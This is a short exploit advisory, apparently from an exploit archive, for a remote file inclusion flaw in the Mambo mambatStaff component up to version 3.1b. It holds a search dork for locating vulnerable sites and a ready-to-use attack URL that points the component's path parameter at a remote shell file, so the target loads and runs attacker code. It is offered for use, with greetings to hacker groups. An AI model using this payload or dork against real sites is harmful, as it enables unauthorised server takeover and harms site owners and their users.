id: 616
date: 07/28/2006
title: Mambo mambatStaff Component <= 3.1b Remote Inclusion Vulnerability
author: Dr.Jr7
cves: 

==================================================================
Mambo mambatStaff Component <= 3.1b Remote Inclusion Vulnerability
==================================================================



# mambatstaff Mambo Component <=  Remote Include Vulnerability

# Rish : High
# Class : Remote
# Script : mambatstaff
# Thanx : www.lezr.com/vb & All kuwait hackers

# d0rkiz : allinurl:"com_mambatstaff"

#
http://www.site.com/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://shell.txt

# by Dr.Jr7



#  0day.today [2023-03-25]  #